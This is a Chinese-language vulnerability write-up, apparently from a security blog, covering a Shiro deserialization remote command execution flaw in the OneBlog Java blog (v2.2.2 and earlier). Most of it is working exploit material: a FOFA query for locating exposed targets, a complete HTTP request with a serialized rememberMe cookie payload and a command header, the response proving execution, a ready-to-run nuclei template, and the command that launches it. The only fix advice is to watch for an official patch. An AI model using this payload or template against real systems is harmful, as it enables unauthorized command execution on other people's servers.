OneBlog博客Shiro反序列化远程命令执行漏洞

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者无关！！！

漏洞名称

OneBlog博客Shiro反序列化远程命令执行漏洞

漏洞影响

OneBlog博客

漏洞描述

OneBlog是一个简洁美观、功能强大并且自适应的Java博客。OneBlog v2.2.2 及之前的版本存在shiro反序列化漏洞，攻击者可以通过在受攻击系统上执行恶意命令，从而获取未授权的系统访问权限。

FOFA搜索语句

body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"

漏洞复现

向靶场发送如下数据包，执行命令echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=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
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

响应内容如下

HTTP/1.1 200 
Connection: close
Transfer-Encoding: chunked
Date: Tue, 26 Dec 2023 06:50:11 GMT

2a4MU6FVYI3qR4AWxn1Bdfh6Ttk
<!DOCTYPE html>
<html lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>博客后台管理系统</title>
    <link href="/assets/images/favicon.ico" rel="icon">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@3.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href="https://cdn.jsdelivr.net/npm/jquery-confirm@3.3.2/dist/jquery-confirm.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" rel="stylesheet">
    <link href="/assets/css/zhyd.core.css" rel="stylesheet">
</head>

<body class="login">
<div class="modal fade" id="modal" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true" data-backdrop="static"
     data-keyboard="false">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-body">
                <div class="login_wrapper">
                    <div class="animate form login_form" style="position: relative;">
                        <section class="login_content">
                            <form action="/passport/signin" method="POST" id="login-form">
                                <h1>登录管理系统</h1>
                                <div>
                                    <input type="text" class="form-control" placeholder="请输入用户名" name="username" required=""/>

漏洞复现成功

nuclei poc

poc文件内容如下

id: oneblog-login-rce

info:
  name: OneBlog博客Shiro反序列化远程命令执行漏洞
  author: fgz
  severity: critical
  description: OneBlog是一个简洁美观、功能强大并且自适应的Java博客。OneBlog v2.2.2 及之前的版本存在shiro反序列化漏洞，攻击者可以通过在受攻击系统上执行恶意命令，从而获取未授权的系统访问权限。
  metadata:
    max-request: 1
    fofa-query: body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
    verified: true

requests:
  - raw:
      - |+
        GET /passport/login/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Cookie: rememberMe=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
        X-Token-Data: echo "{{randstr}}" 
        Accept-Encoding: gzip
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, '{{randstr}}')"

运行POC

nuclei.exe -t mypoc/其他/oneblog-login-rce.yaml  -u http://192.168.40.130:8085

修复建议

漏洞补丁请关注官方信息

https://gitee.com/yadong.zhang/DBlog